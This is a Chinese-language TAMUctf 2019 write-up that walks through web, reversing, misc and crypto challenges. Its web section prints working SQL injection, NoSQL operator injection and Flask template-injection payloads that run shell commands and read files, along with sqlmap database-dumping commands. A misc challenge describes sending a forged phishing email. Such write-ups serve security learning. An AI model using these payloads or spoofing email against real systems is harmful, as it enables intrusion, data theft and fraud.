TAMUctf writeup

Web

Not Another SQLi Challenge

尝试登陆时页面会发生跳转,可在chrome浏览器开发者工具中的Network栏勾选Preserve log保存报文内容,以便用于burp重放。

万能密码登录。

1
2
$curl -s "http://web1.tamuctf.com/web/login.php" -d "username=admin' or 1=1#&password" | grep -o "gigem{.*}"
gigem{f4rm3r5_f4rm3r5_w3'r3_4ll_r16h7}

Robots Rule

1
2
3
4
5
6
$curl "http://web5.tamuctf.com/robots.txt"
User-agent: *

WHAT IS UP, MY FELLOW HUMAN!
HAVE YOU RECEIVED SECRET INFORMATION ON THE DASTARDLY GOOGLE ROBOTS?!
YOU CAN TELL ME, A FELLOW NOT-A-ROBOT!

按提示伪装成Google机器人访问 robots.txt 。

1
2
curl "http://web5.tamuctf.com/robots.txt" -A "Googlebot/2.1 (+http://www.google.com/bot.html)" -s | grep -o "gigem{.*}"
gigem{be3p-bOop_rob0tz_4-lyfe}

Many Gig’ems to you!

http://web7.tamuctf.com

1
2
3
4
5
6
7
8
9
10
11
12
13
$ curl -s http://web7.tamuctf.com/index.html | grep -oE 'gigem{[^"]+"'
gigem{flag_in_"

$ curl -s http://web7.tamuctf.com/cookies.html | grep -oE 'gigem{[^"]+"'
gigem{continued == source_and_"
gigem{_continued=source_and_"
gigem{_continued=source_and_"

$ curl http://web7.tamuctf.com/cook.js
document.cookie = "gigem_continue=cookies}; expires=Thu, 18 Dec 2020 12:00:00 UTC";
document.cookie = "hax0r=flagflagflagflagflagflag; expires=Thu, 18 Dec 2020 12:00:00 UTC";
document.cookie = "gigs=all_the_cookies; expires=Thu, 18 Dec 2020 12:00:00 UTC";
document.cookie = "cookie=flagcookiegigemflagcookie; expires=Thu, 18 Dec 2020 12:00:00 UTC";

几个页面相关的内容连起来得到flag为gigem{flag_in_source_and_cookies 。这个题目意思不大。

Science!

http://web3.tamuctf.com

Difficulty: medium

flask的SSTI。

命令执行

1
{{''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals.linecache.os.popen('ls -Rhl').read()}}

1552741313918

文件读取

1
{{''.__class__.__mro__[2].__subclasses__()[40]('flag.txt').read()}}

gigem{5h3_bl1nd3d_m3_w17h_5c13nc3}

views.py内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import json
import sys
from tamuctf import app
from flask import Flask, render_template, request, jsonify, render_template_string

@app.route('/')
@app.route('/index')
def index():

return render_template('index.html')

@app.route('/science', methods=['POST'])
def science():
try:
chem1 = request.form['chem1']
chem2 = request.form['chem2']
template = '''<html>
<div style="text-align:center">
<h3>The result of combining {} and {} is:</h3></br>
<iframe src="https://giphy.com/embed/AQ2tIhLp4cBa" width="468" height="480" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></div>
</html>'''.format(chem1, chem2)

return render_template_string(template, dir=dir, help=help, locals=locals)
except:
return "Something went wrong"

参考文章:

Buckets

Checkout my s3 bucket website!
http://tamuctf.s3-website-us-west-2.amazonaws.com/

Difficulty: easy

亚马逊云存储器S3 BUCKET未授权访问。

从链接知bucket name为tamuctf ,访问http://tamuctf.s3.amazonaws.com/

在页面中搜索发现Dogs/CC2B70BD238F48BE29D8F0D42B170127/CBD2DD691D3DB1EBF96B283BDC8FD9A1/flag.txt

访问http://tamuctf.s3.amazonaws.com/Dogs/CC2B70BD238F48BE29D8F0D42B170127/CBD2DD691D3DB1EBF96B283BDC8FD9A1/flag.txt

得到flag为flag{W0W_S3_BAD_PERMISSIONS}

参考文章:

Login App

http://web4.tamuctf.com

Difficulty: medium

页面源码有一段JavaScript

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<script>
$("#submit").on('click', function(){
$.ajax({
url: 'login',
type : "POST",
dataType : 'json',
data : JSON.stringify({"username": $("#username").val(), "password": $("#password").val()}),
contentType: 'application/json;charset=UTF-8',
success : function(result) {
$(".result").html(result);
console.log(result);
alert(result);
},
error: function(xhr, resp, text) {
$(".result").html("Something went wrong");
console.log(xhr, resp, text);
}
})
});
</script>

NoSQL注入。

报文:

1
2
3
4
5
6
7
8
9
POST /login HTTP/1.1
Host: web4.tamuctf.com
Content-Length: 50
Accept: text/plain
Content-Type: application/json;charset=UTF-8
Referer: http://web4.tamuctf.com/admin
Connection: close

{"username":{"$eq":"admin"},"password":{"$gt":""}}

1552746047220

1
2
3
4
5
curl -H 'Content-Type: application/json; charset=UTF-8' -X POST --data '{"username":{"$ne":"nosql"},"password":{"$ne":"injection"}}' http://web4.tamuctf.com/login
"Welcome: bob!"

curl -H 'Content-Type: application/json; charset=UTF-8' -X POST --data '{"username":{"$ne":"bob"},"password":{"$ne":"injection"}}' http://web4.tamuctf.com/login
"Welcome: admin!\ngigem{n0_sql?_n0_pr0bl3m_8a8651c31f16f5dea}"

参考文章:

一个有趣的实例让NoSQL注入不再神秘

Bird Box Challenge

http://web2.tamuctf.com

We’ve got Aggies, Trucks, and Eggs!

Difficulty: hard

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
neo@o:~$ curl -sG --data-urlencode "Search=test" http://web2.tamuctf.com/Search.php  | grep -o "<h1>.*</h1>"
<h1>Our search isn't THAT good...</h1>

neo@o:~$ curl -sG --data-urlencode "Search=test' or 1=1#" http://web2.tamuctf.com/Search.php | grep -o "<h1>.*</h1>"
<h1>Nice try, nothing to see here.</h1>

neo@o:~$ curl -sG --data-urlencode "Search=test' and 1=0 union select 123 #" http://web2.tamuctf.com/Search.php | grep -o "<h1>.*</h1>"
<h1>Nope. Not gonna let you use that command.</h1>

neo@o:~$ curl -sG --data-urlencode "Search=test' and 1=0 union 123 #" http://web2.tamuctf.com/Search.php | grep -o "<h1>.*</h1>"
<h1>Nope. Not gonna let you use that command.</h1>

neo@o:~$ curl -sG --data-urlencode "Search=test' and 1=0 select 123 #" http://web2.tamuctf.com/Search.php | grep -o "<h1>.*</h1>"
<h1> Our search isn't THAT good... </h1>

neo@o:~$ curl -sG --data-urlencode "Search=test'union select 123#" http://web2.tamuctf.com/Search.php | grep -o "<h1>.*</h1>"
<h1>123</h1>

neo@o:~$ curl -sG --data-urlencode "Search=test'union select version()#" http://web2.tamuctf.com/Search.php | grep -o "<h1>.*</h1>"
<h1>5.7.25-0ubuntu0.18.04.2</h1>

注入一把梭。

1
2
3
4
5
6
7
8
9
10
11
'UNION ALL SELECT GROUP_CONCAT(table_schema) FROM information_schema.tables WHERE table_schema != 'information_schema' #
得到数据库名:SqliDB

'UNION ALL SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema != 'information_schema' #
得到表名:Search

'UNION ALL SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_schema != 'information_schema' #
得到列名:items

'UNION ALL SELECT GROUP_CONCAT(items) FROM Search #
得到记录:Eggs,Trucks,Aggies

翻一圈啥也没有,flag不在数据库中,尝试用户名。

1
2
neo@o:~$ curl -sG --data-urlencode "Search=test'union select current_user#" http://web2.tamuctf.com/Search.php  | grep -o "<h1>.*</h1>"
<h1>gigem{w3_4r3_th3_4ggi3s}@localhost</h1>

实际上也可以直接上sqlmap。

1
sqlmap -u "http://web2.tamuctf.com/Search.php?Search=eggs" -p Search --dbms mysql --random-agent --sql-shell --hex --threads 10 --proxy=http://127.0.0.1:1080

1552750064087

1337 Secur1ty

http://web6.tamuctf.com

Difficulty: hard

注册用户后进入。

二维码解码结果为otpauth://totp/TAMU_CTF?secret=5UGMBIONB66MCOXH

消息是可以点击查看详情的。

1552782392453

对该链接http://web6.tamuctf.com/message?id=2 测试注入。

1
python sqlmap.py -u "http://web6.tamuctf.com/message?id=2" -p id --threads 10 --dump-all --random-agent --hex

1552782785371

得到admin用户邮箱为 1337-admin@l337secur1ty.hak ,Secret值为WIFHXDZ3BOHJMJSC,id为1,密码哈希为02ca0b0603222a090fe2fbf3ba97d90c ,在somd5查询对应明文为secretpasscode

使用burp修改cookie后转发可见flag为gigem{th3_T0tp_1s_we4k_w1tH_yoU}

1552783404288

Reversing

Cheesy

1
2
echo Z2lnZW17M2E1eV9SM3YzcjUxTjYhfQ== | base64 -d
gigem{3a5y_R3v3r51N6!}

Snakes over cheese

使用pyc在线反编译 得到如下代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
# uncompyle6 version 3.2.5
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.5 (default, Oct 30 2018, 23:45:53)
# [GCC 4.8.5 20150623 (Red Hat 4.8.5-36)]
# Embedded file name: reversing2.py
# Compiled at: 2018-10-08 03:28:58
from datetime import datetime
Fqaa = [102, 108, 97, 103, 123, 100, 101, 99, 111, 109, 112, 105, 108, 101, 125]
XidT = [83, 117, 112, 101, 114, 83, 101, 99, 114, 101, 116, 75, 101, 121]

def main():
print 'Clock.exe'
input = raw_input('>: ').strip()
kUIl = ''
for i in XidT:
kUIl += chr(i)

if input == kUIl:
alYe = ''
for i in Fqaa:
alYe += chr(i)

print alYe
else:
print datetime.now()


if __name__ == '__main__':
main()

则Fqaa转换后为 flag{decompile}

042

Cheers for actual assembly!

#medium

reversing3.s

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
> 	.section	__TEXT,__text,regular,pure_instructions
> .build_version macos, 10, 14
> .globl _concat ## -- Begin function concat
> .p2align 4, 0x90
> _concat: ## @concat
> .cfi_startproc
> ## %bb.0:
> pushq %rbp
> .cfi_def_cfa_offset 16
> .cfi_offset %rbp, -16
> movq %rsp, %rbp
> .cfi_def_cfa_register %rbp
> subq $48, %rsp
> movq %rdi, -8(%rbp)
> movq %rsi, -16(%rbp)
> movq -8(%rbp), %rdi
> callq _strlen
> movq -16(%rbp), %rdi
> movq %rax, -32(%rbp) ## 8-byte Spill
> callq _strlen
> movq -32(%rbp), %rsi ## 8-byte Reload
> addq %rax, %rsi
> addq $1, %rsi
> movq %rsi, %rdi
> callq _malloc
> movq $-1, %rdx
> movq %rax, -24(%rbp)
> movq -24(%rbp), %rdi
> movq -8(%rbp), %rsi
> callq ___strcpy_chk
> movq $-1, %rdx
> movq -24(%rbp), %rdi
> movq -16(%rbp), %rsi
> movq %rax, -40(%rbp) ## 8-byte Spill
> callq ___strcpy_chk
> movq -24(%rbp), %rdx
> movq %rax, -48(%rbp) ## 8-byte Spill
> movq %rdx, %rax
> addq $48, %rsp
> popq %rbp
> retq
> .cfi_endproc
> ## -- End function
> .globl _main ## -- Begin function main
> .p2align 4, 0x90
> _main: ## @main
> .cfi_startproc
> ## %bb.0:
> pushq %rbp
> .cfi_def_cfa_offset 16
> .cfi_offset %rbp, -16
> movq %rsp, %rbp
> .cfi_def_cfa_register %rbp
> subq $80, %rsp
> leaq L_.str(%rip), %rdi
> movl $3, %eax
> movl $14, %ecx
> xorl %esi, %esi
> movl $8, %edx
> ## kill: def %rdx killed %edx
> leaq -16(%rbp), %r8
> movq ___stack_chk_guard@GOTPCREL(%rip), %r9
> movq (%r9), %r9
> movq %r9, -8(%rbp)
> movl $0, -20(%rbp)
> movq %rdi, -56(%rbp) ## 8-byte Spill
> movq %r8, %rdi
> movl %ecx, -60(%rbp) ## 4-byte Spill
> movl %eax, -64(%rbp) ## 4-byte Spill
> callq _memset
> movb $65, -16(%rbp)
> movb $53, -15(%rbp)
> movb $53, -14(%rbp)
> movb $51, -13(%rbp)
> movb $77, -12(%rbp)
> movb $98, -11(%rbp)
> movb $49, -10(%rbp)
> movb $89, -9(%rbp)
> movl $0, -28(%rbp)
> movl $1, -32(%rbp)
> movl $2, -36(%rbp)
> movl -36(%rbp), %eax
> imull -36(%rbp), %eax
> imull -36(%rbp), %eax
> movl -28(%rbp), %ecx
> addl -32(%rbp), %ecx
> addl -32(%rbp), %ecx
> addl -32(%rbp), %ecx
> imull %ecx, %eax
> cltd
> movl -60(%rbp), %ecx ## 4-byte Reload
> idivl %ecx
> movl %eax, -40(%rbp)
> movl -36(%rbp), %eax
> imull -36(%rbp), %eax
> imull -36(%rbp), %eax
> movl -28(%rbp), %esi
> addl -32(%rbp), %esi
> addl -32(%rbp), %esi
> imull %esi, %eax
> cltd
> movl -64(%rbp), %esi ## 4-byte Reload
> idivl %esi
> movl %eax, -44(%rbp)
> movl -40(%rbp), %esi
> movq -56(%rbp), %rdi ## 8-byte Reload
> movb $0, %al
> callq _printf
> leaq L_.str.1(%rip), %rdi
> movl -44(%rbp), %esi
> movl %eax, -68(%rbp) ## 4-byte Spill
> movb $0, %al
> callq _printf
> leaq L_.str.2(%rip), %rdi
> leaq -16(%rbp), %rsi
> movl %eax, -72(%rbp) ## 4-byte Spill
> movb $0, %al
> callq _printf
> movq ___stack_chk_guard@GOTPCREL(%rip), %rsi
> movq (%rsi), %rsi
> movq -8(%rbp), %rdi
> cmpq %rdi, %rsi
> movl %eax, -76(%rbp) ## 4-byte Spill
> jne LBB1_2
> ## %bb.1:
> xorl %eax, %eax
> addq $80, %rsp
> popq %rbp
> retq
> LBB1_2:
> callq ___stack_chk_fail
> ud2
> .cfi_endproc
> ## -- End function
> .section __TEXT,__cstring,cstring_literals
> L_.str: ## @.str
> .asciz "The answer: %d\n"
>
> L_.str.1: ## @.str.1
> .asciz "Maybe it's this:%d\n"
>
> L_.str.2: ## @.str.2
> .asciz "gigem{%s}\n"
>
>
> .subsections_via_symbols
>

注意到71-78行。

1
2
print "gigem{%s}"%"".join(chr(i) for i in [65,53,53,51,77,98,49,89])
# gigem{A553Mb1Y}

Misc

Who am I?

What is the A record for tamuctf.com?
(Not in standard gigem{flag} format)

tamuctf.com 的域名A记录为52.33.57.247 ,提交即可。可使用这个网站 或者命令nslookup -type=all tamuctf.com

Who do I trust?

Who issued the certificate to tamuctf.com?
(Not in standard gigem{flag} format)

查看证书知颁发机构为 Let's Encrypt Authority X3

Where am I?

What is the name of the city where the server for tamuctf.com is located?

(Not in standard gigem{flag} format)

使用在线网站 查询得到服务器所在城市为 Boardman

I heard you like files.

1
2
3
$binwalk -e art.png
$tail -n1 _art.png.extracted/word/media/image1.png | base64 -d
flag{P0lYt@r_D0_y0u_G3t_It_N0w?}

Hello World

在页面全选可发现端倪。

1552784857947

这是一种由空白字符(空白符、制表符、换行符)组成的编程语言)。这是一个 在线解释器

1552784704688

flag is gigem{0h_my_wh4t_sp4c1ng_y0u_h4v3}

Onboarding Checklist

From: importantperson@somebigcorp.com
Date: Feb 22, 2019 9:00 AM
To: someguy@somebigcorp.com
Subject: New Employee Access

Hello Some Guy,

We need to begin sending requests for the new employee to get access to our security appliances. I believe they already know that you are authorized to make a new account request. Would you mind sending the new employee’s email address to tamuctf@gmail.com so they can process the account request?

Thank you,
Important Person

The new employee can be a little slow to respond.

Difficulty: easy

2/26 8:42 am CST: Visting somebigcorp.com is not part of the challenge

按照指示发送钓鱼邮件,接收到flag为gigem{wuT_4n_31337_sp0ofer_494C4F5645594F55}

工具:伪造邮件临时邮箱

1552787841366

1552787882188

Crypto

-.-

To 1337-H4X0R:

Our coworker Bob loves a good classical cipher. Unfortunately, he also loves to send everything encrypted with these ciphers. Can you go ahead and decrypt this for me?

Difficulty: easy

flag.txt

1
2
> dah-dah-dah-dah-dah dah-di-di-dah di-di-di-di-dit dah-dah-di-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-dah-dah-dah di-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-di-dit dah-dah-dah-di-dit dah-dah-di-di-dit di-di-di-di-dah di-di-di-di-dah dah-dah-di-di-dit di-di-di-di-dit di-dah-dah-dah-dah di-di-di-dah-dah dah-dah-dah-di-dit dah-di-di-di-dit di-di-di-di-dit di-di-di-dah-dah dah-dah-dah-di-dit dah-dah-di-di-dit di-dah-dah-dah-dah dah-di-di-di-dit dit dah-di-di-di-dit dah-di-dit di-di-di-di-dah dah-di-dit di-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dit di-di-di-di-dit di-di-dah-dah-dah di-dah dah-dah-di-di-dit di-di-di-dah-dah dah-dah-di-di-dit dah-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit di-di-di-di-dah dah-dah-dah-di-dit dah-di-di-di-dit dah-di-di-dit dah-di-di-di-dit di-dah di-di-di-di-dah dah-dah-dah-dah-dit dah-dah-di-di-dit di-di-di-di-dah di-di-dah-dah-dah di-dah di-di-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-dah-dah-dah-dah di-di-dah-dah-dah dah-di-di-di-dit di-di-di-di-dah di-dah dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-di-di-dit di-dah dah-dah-di-di-dit dah-di-di-di-dit dah-di-di-di-dit di-dah dah-di-di-di-dit dah-di-dit di-di-dah-dah-dah di-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-dit di-di-di-di-dah di-di-di-di-dah dah-di-di-di-dit dah-di-di-dit dah-di-di-di-dit dah-di-di-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-di-dit dit di-di-di-di-dah dit di-di-di-dah-dah dah-dah-dah-dah-dit dah-di-di-di-dit dah-di-di-di-dit dah-di-di-di-dit dah-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-di-di-di-dit di-di-di-di-dah di-di-di-di-dit di-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-di-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-dah-dah dah-dah-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit di-di-dah-dit di-di-di-di-dit di-di-di-di-dah di-di-di-dah-dah dah-dah-dah-dah-dah di-di-di-di-dit dah-dah-dah-dah-dah di-di-di-di-dit di-dah di-di-di-di-dit di-dah-dah-dah-dah dah-di-di-di-dit dah-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-dit di-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-di-dah di-di-di-di-dit di-dah di-di-di-di-dah dah-di-dit dah-dah-di-di-dit dah-di-di-di-dit di-di-dah-dah-dah di-dah di-di-dah-dah-dah di-dah-dah-dah-dah di-di-di-di-dah dah-di-di-di-dit dah-di-di-di-dit dah-di-di-dit di-di-di-dah-dah dah-dah-dah-di-dit dah-di-di-di-dit dah-di-dah-dit di-di-dah-dah-dah di-di-di-di-dit dah-di-di-di-dit di-di-dah-dah-dah dah-di-di-di-dit di-dah dah-dah-di-di-dit di-dah-dah-dah-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-di-dit dah-dah-dah-dah-dah di-di-di-di-dah dah-di-dit dah-di-di-di-dit dah-di-di-di-dit di-di-di-di-dah dah-dah-dah-dah-dit di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit dah-di-dit dah-di-di-di-dit di-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit dah-dah-di-di-dit di-dah di-di-di-di-dah dah-dah-di-di-dit di-di-dah-dah-dah dah-dah-dah-dah-dah dah-di-di-di-dit dah-dah-di-di-dit dah-di-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit dah-dah-di-di-dit dah-di-di-di-dit di-di-di-di-dit dah-di-di-di-dit dah-di-dit dah-dah-di-di-dit dah-di-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-di-dah-dah di-dah-dah-dah-dah dah-di-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-di-di-dit di-di-di-di-dit di-di-dah-dit dah-di-di-di-dit di-di-di-dah-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-dah-dah di-dah-dah-dah-dah di-di-di-di-dah di-di-di-dah-dah di-di-di-di-dah dah-di-di-dit di-di-dah-dah-dah dah-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dit di-di-di-dah-dah dah-dah-dah-dah-dah dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dit di-di-dah-dit dah-di-di-di-dit dah-dah-dah-di-dit di-di-di-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-dah-dah di-di-di-di-dit di-di-dah-dit dah-di-di-di-dit dah-di-dit di-di-di-dah-dah di-di-di-di-dah di-di-di-di-dah dah-dah-dah-dah-dit di-di-di-dah-dah di-dah-dah-dah-dah dah-dah-di-di-dit dah-di-dit di-di-dah-dah-dah dah-dah-dah-dah-dah dah-dah-di-di-dit di-di-di-di-dit dah-dah-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit dah-dah-di-di-dit di-dah di-di-di-di-dah dah-di-di-dit di-di-di-di-dit di-dah dah-dah-di-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit di-di-dah-dit dah-di-di-di-dit dah-di-dit dah-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dah di-di-di-di-dah di-di-di-di-dit di-di-di-dah-dah dah-di-di-di-dit dah-dah-dah-di-dit di-di-di-di-dah dah-di-dah-dit dah-di-di-di-dit dah-di-dit di-di-di-dah-dah dah-dah-dah-di-dit di-di-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit dah-di-di-di-dit dit di-di-di-di-dit di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dah dah-dah-di-di-dit dah-dah-di-di-dit di-di-di-di-dah di-dah di-di-di-di-dah dah-dah-dah-dah-dah di-di-di-di-dah dit dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dah di-di-dah-dit di-di-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit dah-di-di-di-dit di-di-di-di-dit dah-dah-dah-di-dit di-di-dah-dah-dah dah-di-di-di-dit di-di-di-dah-dah dah-dah-dah-di-dit dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dah dah-dah-dah-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit dit di-di-dah-dah-dah di-dah-dah-dah-dah di-di-di-dah-dah di-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dit di-di-di-di-dah dah-dah-di-di-dit di-dah-dah-dah-dah dah-dah-di-di-dit dah-di-di-di-dit di-di-di-dah-dah dah-dah-dah-dah-dah di-di-di-di-dit dah-di-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dit di-di-dah-dah-dah dah-dah-di-di-dit di-dah di-di-di-di-dit dah-di-di-di-dit di-di-dah-dah-dah di-dah-dah-dah-dah dah-di-di-di-dit di-dah di-di-dah-dah-dah di-dah-dah-dah-dah dah-dah-di-di-dit dah-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-di-dah-dah dah-dah-dah-di-dit di-di-di-di-dah di-di-dah-dah-dah dah-di-di-di-dit di-dah dah-di-di-di-dit di-di-di-di-dah di-di-di-di-dah dit di-di-di-di-dah dah-dah-dah-dah-dit dah-dah-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-dah-dah di-di-di-di-dit dah-dah-di-di-dit dah-dah-di-di-dit di-di-dah-dah-dah di-di-di-dah-dah di-di-dah-dah-dah di-di-di-di-dah di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-di-dit di-di-di-di-dit di-dah di-di-di-di-dah di-di-dah-dit di-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dit di-dah di-di-di-dah-dah di-di-dah-dah-dah dah-dah-di-di-dit di-dah di-di-di-dah-dah dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dah di-di-di-dah-dah dah-dah-di-di-dit di-di-dah-dah-dah dah-di-di-di-dit dah-dah-di-di-dit dah-dah-dah-di-dit di-di-di-di-dah dah-di-dah-dit di-di-di-di-dah dah-dah-dah-dah-dah di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dah di-di-dah-dit di-di-di-dah-dah dah-dah-di-di-dit di-di-di-dah-dah di-di-di-di-dah di-di-di-dah-dah di-dah-dah-dah-dah di-di-di-dah-dah dah-dah-dah-dah-dah di-di-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah dah-dah-dah-dah-dit
>

solve.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
import re
def morse(s):
morseChart = ['.-', '-...', '-.-.', '-..', '.', '..-.', '--.',
'....', '..', '.---', '-.-', '.-..', '--', '-.',
'---', '.--.', '--.-', '.-.', '...', '-', '..-',
'...-', '.--', '-..-', '-.--', '--..', '-----', '.----',
'..---', '...--', '....-', '.....', '-....', '--...', '---..',
'----.', '.-.-.-', '--..--', '..--..', '-....-', '.----.', '---...',
'.-..-.', '-..-.', '.--.-.', '-.-.-.', '-...-', '-.-.--', '..--.-',
'-.--.', '-.--.-', '...-..-', '.-...', '.-.-.', ' ', '*'
]
alphaChart = ['a', 'b', 'c', 'd', 'e', 'f', 'g',
'h', 'i', 'j', 'k', 'l', 'm', 'n',
'o', 'p', 'q', 'r', 's', 't', 'u',
'v', 'w', 'x', 'y', 'z', '0', '1',
'2', '3', '4', '5', '6', '7', '8',
'9', '.', ',', '?', '-', "'", ':',
'"', '/', '@', ';', '=', '!', '_',
'(', ')', '$', '&', '+', ' ', '#'
]

# or as a dict -> {c[1][i]: c[0][i] for i in xrange(len(c[0]))}
c = [morseChart, alphaChart]

s = s.lower()

# replace characters not in alphaChart with '#' ,which shall be '*' in
# encoded string
s = re.sub('[^a-z0-9.,?\-\':"/@;=!_()$&+ ]', '#', s)

# for convenience sake, I choose not to deal with space in morse.
s = re.sub('\s+', ' ', s)

m = 1 # default to decode
# if mot mismatch that condition,we are to encode.
if not re.match('[^-._ ]', s):
# occasionally we meet [ ._]+ instead of [ .-]+
s = s.replace('_', '-')
s = re.split(' ', s)
m = 0 # we are to encode by morse

r = []
# list().extend(foo) returns None so we use 'or r'
return (m * ' ').join(r.extend([c[1 - m][c[m].index(i)] for i in s]) or r)

cipher="dah-dah-dah-dah-dah dah-di-di-dah di-di-di-di-dit dah-dah-di-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-dah-dah-dah di-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-di-dit dah-dah-dah-di-dit dah-dah-di-di-dit di-di-di-di-dah di-di-di-di-dah dah-dah-di-di-dit di-di-di-di-dit di-dah-dah-dah-dah di-di-di-dah-dah dah-dah-dah-di-dit dah-di-di-di-dit di-di-di-di-dit di-di-di-dah-dah dah-dah-dah-di-dit dah-dah-di-di-dit di-dah-dah-dah-dah dah-di-di-di-dit dit dah-di-di-di-dit dah-di-dit di-di-di-di-dah dah-di-dit di-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dit di-di-di-di-dit di-di-dah-dah-dah di-dah dah-dah-di-di-dit di-di-di-dah-dah dah-dah-di-di-dit dah-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit di-di-di-di-dah dah-dah-dah-di-dit dah-di-di-di-dit dah-di-di-dit dah-di-di-di-dit di-dah di-di-di-di-dah dah-dah-dah-dah-dit dah-dah-di-di-dit di-di-di-di-dah di-di-dah-dah-dah di-dah di-di-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-dah-dah-dah-dah di-di-dah-dah-dah dah-di-di-di-dit di-di-di-di-dah di-dah dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-di-di-dit di-dah dah-dah-di-di-dit dah-di-di-di-dit dah-di-di-di-dit di-dah dah-di-di-di-dit dah-di-dit di-di-dah-dah-dah di-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-dit di-di-di-di-dah di-di-di-di-dah dah-di-di-di-dit dah-di-di-dit dah-di-di-di-dit dah-di-di-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-di-dit dit di-di-di-di-dah dit di-di-di-dah-dah dah-dah-dah-dah-dit dah-di-di-di-dit dah-di-di-di-dit dah-di-di-di-dit dah-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-di-di-di-dit di-di-di-di-dah di-di-di-di-dit di-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-di-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-dah-dah dah-dah-di-di-dit 